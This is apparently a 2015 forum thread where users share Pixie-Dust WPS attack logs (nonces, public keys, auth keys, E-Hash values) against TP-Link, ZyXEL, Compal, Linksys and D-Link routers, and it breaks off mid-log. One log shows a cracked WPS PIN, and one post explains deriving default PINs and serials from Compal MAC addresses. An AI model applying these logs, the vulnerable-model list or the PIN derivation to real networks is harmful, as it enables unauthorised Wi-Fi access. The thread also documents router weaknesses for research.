Code:[P] E-Nonce: 74:d4:79:d4:5f:37:5d:a2:55:95:b3:8e:3e:b4:42:b0 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: b7:b5:92:8b:37:23:d1:97:30:cc:fd:86:06:88:40:05:ee:d9:d3:50:9e:4b:04:1a:c7:ce:2a:43:73:69:79:74:eb:ca:03:4d:c4:01:c2:1d:2d:54:df:11:89:ad:23:6b:63:15:c0:d2:80:32:29:38:a8:3f:27:34:85:8e:7e:f3:5d:48:1d:51:3f:36:3d:fa:0b:bf:3e:4c:69:9c:0e:15:ed:0c:f2:06:39:a6:44:df:07:26:0d:c3:97:f8:02:9f:3c:c0:7c:ae:e1:63:82:f3:e6:11:7c:08:86:cd:11:17:28:d3:df:fe:ea:9a:bf:b6:04:23:62:a9:69:52:2c:be:f8:47:84:b8:29:1e:34:ab:ae:73:e5:b2:5c:d9:7e:15:0a:67:4f:9e:b8:f5:ab:02:6c:42:51:70:f9:75:17:1f:0b:14:9b:2b:47:15:7f:0c:c7:93:f1:bc:55:21:fe:7e:e7:43:17:f3:dd:28:3c:3f:09:a8:f9:e5:2b:30:46:a0 [P] AuthKey: 17:c4:8c:1c:30:2d:b7:07:95:19:7e:d7:dc:cb:c5:c2:54:31:c2:98:81:4c:e3:61:7e:6e:1f:8e:01:44:af:41 [P] E-Hash1: 29:ee:d1:39:09:2f:ed:6c:b6:fe:3f:d9:7e:65:42:1a:a9:bb:5f:09:92:5f:4a:13:de:71:15:0c:39:62:f7:b2 [P] E-Hash2: ad:14:f5:b9:34:99:c7:99:17:2f:b2:d4:fb:d2:52:af:dc:04:61:54:69:d6:a3:47:55:e8:20:37:d2:23:7c:7aCode:[P] E-Nonce: 76:fd:23:67:28:98:00:14:74:08:2c:e2:58:e6:08:7b [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: f1:0e:83:37:1e:6d:29:4a:ef:30:56:56:ef:75:6c:e4:b9:43:e1:27:e6:e8:52:cd:ed:e3:fa:9f:0d:08:15:bc:90:ac:94:2f:c9:85:c3:0d:f3:3b:cb:56:ad:5d:74:01:05:1c:9e:43:60:74:62:79:0e:5e:6d:b5:5e:e6:06:b6:8c:b5:7e:d0:eb:ed:17:6a:76:ca:aa:c2:f5:0e:8c:b7:da:e6:3a:ba:f9:1d:04:34:92:fc:91:0c:8c:e5:bb:70:58:22:95:34:85:54:ba:c3:cb:d7:c6:3e:65:d1:0f:91:0d:b9:d2:98:cc:a8:25:db:d8:0a:c9:f0:40:5f:4c:36:84:1a:f6:83:3a:5b:82:1e:44:d0:be:b8:29:ad:1f:0d:8b:bb:29:b8:7f:4d:12:0f:c7:c6:50:b0:2b:97:16:4a:89:b5:7c:cd:06:ab:03:59:4d:fe:3c:b9:7e:35:24:fc:24:b2:4a:67:c8:3c:b3:6e:7b:45:e9:d2:36:bf:02:9f [P] AuthKey: 5a:90:d3:1a:7f:0a:24:a5:3d:29:47:c5:b9:ca:65:83:86:e0:9a:76:75:3c:47:e3:28:b6:1c:33:95:1e:ee:e4 [P] E-Hash1: 7b:ff:91:d0:ca:6f:c1:c6:c0:fb:5f:a6:21:27:54:1b:1b:1f:60:82:53:8f:26:f7:d8:55:4d:1e:49:1a:6a:6e [P] E-Hash2: 79:8f:b2:12:da:68:b0:3d:89:8b:80:b3:43:cb:9f:f0:2c:c2:50:ec:30:dd:19:78:8d:b7:83:a0:27:df:5d:ebCode:[P] E-Nonce: 45:2a:2b:5c:25:9d:91:39:42:e9:38:7c:7a:d1:1b:1c [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: ac:1c:fa:9e:2a:80:76:e8:40:44:ff:9e:a3:6a:3a:c0:6d:8b:92:53:bf:98:ae:7a:22:60:c5:22:3f:40:a3:aa:16:19:37:76:dc:5f:49:67:ac:2b:4d:a6:b1:3e:87:7c:a4:b0:3b:55:56:88:75:b5:a9:e6:a9:55:c0:26:eb:68:f7:5d:84:06:c7:77:e5:55:fa:49:fe:45:03:84:2c:5d:bc:b9:76:99:f8:93:32:73:2c:2a:a7:0d:eb:1d:4c:3d:2a:7e:a7:a0:62:ee:51:1a:f8:39:f5:33:40:71:1b:10:18:39:da:27:b4:5b:3a:75:6e:86:45:92:a1:df:fe:75:2a:27:98:28:1e:a7:cc:a9:b3:58:2d:c8:14:33:80:55:3d:ac:f0:bf:65:a7:05:f3:6d:90:2c:0e:4f:29:95:b7:dc:49:f9:58:9e:1c:7d:d8:07:d7:c1:f3:8c:4b:4d:98:a1:0d:01:0e:5a:4d:66:26:09:73:d1:02:03:f7:16:8c [P] AuthKey: 5a:3d:0b:a3:41:42:b2:8f:18:35:1f:a9:b3:be:45:1f:ef:a7:0d:32:f0:3d:06:59:51:bb:8a:b2:e1:26:eb:5f [P] E-Hash1: b3:a9:37:ba:30:37:d7:65:d0:6e:5e:93:a1:60:0f:9f:7d:2f:f6:7c:1b:80:3e:72:84:fa:84:5b:9d:63:0f:06 [P] E-Hash2: 98:16:a7:fc:8c:0c:ce:1c:2c:58:dd:8e:1b:b1:92:ac:ca:4b:56:df:9e:0c:d3:9c:89:da:e7:7f:90:9e:83:d3Code:[P] E-Nonce: 14:d1:e7:b1:50:ea:91:a3:0f:8b:e5:97:63:61:ef:3c [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: f5:a3:7d:0a:de:b7:c1:a1:ea:16:72:04:be:41:a6:7b:d6:ce:52:d1:7c:7f:42:51:f9:7d:04:6d:97:4c:97:0b:6b:18:02:fa:be:8a:3e:0c:aa:a1:82:b7:dd:3b:9b:e3:c8:60:13:b6:8f:e8:c9:8f:69:2b:49:1c:e6:53:c8:1e:af:03:4f:d7:d1:1c:a4:52:96:91:18:66:45:6c:0b:29:61:c4:8b:13:71:d5:ee:bd:53:19:63:6e:65:3d:47:5e:ed:73:75:15:39:b2:e8:13:69:fd:3c:0f:b1:e3:17:53:1a:84:93:33:81:64:01:9b:d5:99:0f:c4:a2:20:63:1e:d6:15:2b:36:f8:e0:11:ef:3a:3d:8a:b9:71:78:a1:49:a2:be:23:83:79:bd:d8:8e:8a:90:21:ce:4a:c9:08:07:b8:b7:cf:e4:0d:2c:bd:9e:38:bd:48:13:97:02:72:ef:b6:95:22:82:b5:e0:ff:ba:a4:4c:f1:93:69:90:d5:27 [P] AuthKey: 44:65:47:ff:b9:02:fe:58:58:16:54:30:15:a5:10:c1:50:1c:04:3c:d6:d2:07:a5:73:54:93:a8:0b:4b:3b:90 [P] E-Hash1: 3a:4b:c9:1c:51:f9:6a:c5:26:3c:ba:41:2d:06:c9:62:85:4a:5f:6a:16:17:a5:40:9a:6e:b6:13:1b:48:01:28 [P] E-Hash2: db:00:8d:a9:86:2f:14:12:4a:ee:23:e3:50:8b:1a:d3:c4:da:39:09:d8:55:07:7d:53:a3:3f:19:3e:ce:65:1cCode:[P] E-Nonce: 3c:d0:62:c2:3b:83:41:84:5a:bc:d5:92:40:b4:ac:45 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: 8b:19:f7:8c:50:67:a3:b9:ec:61:ba:b1:a6:e5:6b:94:37:89:46:b3:3c:68:62:16:57:bc:f6:00:fe:20:a6:63:82:65:f5:ac:c0:29:96:89:d0:03:8d:ed:06:b2:f7:28:00:5d:6b:fc:76:d0:f6:1c:53:a4:17:46:9b:f9:64:69:bd:a4:0e:bd:b7:32:fc:a7:7c:cc:2f:dc:2e:73:45:71:b7:46:82:4d:ec:ab:5e:d9:04:1d:a6:a0:12:63:5e:a8:da:ee:2f:15:d7:6b:9e:23:51:2b:bd:f3:a0:4d:53:55:b0:8b:a8:8f:e5:ec:cd:8b:c6:b3:7f:a0:8d:9a:4d:ea:7b:b9:5c:a2:0b:cd:f7:b7:4c:ad:c8:0c:b6:c4:21:c2:4e:91:b9:19:13:65:1c:9a:bb:0e:b5:f7:3f:92:eb:c3:4b:21:11:47:31:2a:46:06:2f:4e:9a:0d:2a:0c:37:67:17:a8:0f:06:b2:1f:19:c6:f7:25:7f:c1:c0:16:0f:48 [P] AuthKey: 0c:a1:7a:6a:da:34:42:18:96:8d:dd:8d:61:98:05:a2:ac:6f:15:4f:2c:8b:70:d3:54:2f:c2:32:06:db:52:96 [P] E-Hash1: 29:c1:bb:a1:23:c4:69:fa:0d:56:46:98:61:51:c0:8f:60:fb:fd:5f:0f:d1:d0:1a:df:56:d1:d5:12:e7:71:5d [P] E-Hash2: 62:0b:ad:55:b2:3d:1d:b8:bf:e4:39:27:59:1d:43:47:12:3f:82:22:66:32:87:7a:a8:ec:c2:52:0b:13:f2:b6
Last edited by someone_else; 2015-04-25 at 12:32.
Alright thanks... there was no other pin listed?
.
Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)
This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..
Last edited by Saydamination; 2015-04-25 at 15:41. Reason: other reasons
nope. Don't know, if this is ISP/Country specific, but (again) all testet Routers have the same PIN.
Here is the User-Manual, the WPS Menu is described on page 50.
if it's any use for anyone
TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341
Code:[P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e [P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc [P] WPS Manufacturer: TP-LINK [P] WPS Model Number: 8.0 [P] WPS Model Serial Number: 1.0 [+] Received M1 message [P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2 [P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84 [+] Sending M2 message [P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5 [P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 1 s
Zyxel Keenetic vulnerable
unknown chpset
Code:[P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b [P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b [P] WPS Manufacturer: ZyXEL Communications Corp. [P] WPS Model Number: KEENETIC series [P] WPS Model Serial Number: none [+] Received M1 message [P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44 [P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08 [+] Sending M2 message [+] Received M1 message [P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7 [P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09 [Pixie-Dust] [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11 [Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31 [Pixie-Dust] [+] WPS pin: 19048185
Sorry for off-topic, i've got further information about Compal:
MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In mine 8 cases, "N" is 53059.(Convert this Number (with leading zero)in HEX and you get 353B,Part of the MAC-Address.
The other 9 Numbers "x" are the last 6 Letters from the MAC-Address in Decimal.
And cbn should be something like „Compal Broadband Network“.
Later last Day i've got two Compal-Models with MAC-Address (DC:53:7C), each of them have a different Pin :
AND HERE:Code:[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c [P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57 [P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70 [P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
/\/\Code:[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf [P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b [P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64 [P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
NOT VULNERABLE:
Linksys WRT120n
Atheros AR9285
NOT VULNERABLE:Code:[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f [P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84 [P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15 [P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2 [P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe [P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
D-Link 615 B2
Atheros AR5416/Atheros AR2122
Code:[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb [P] PKE: 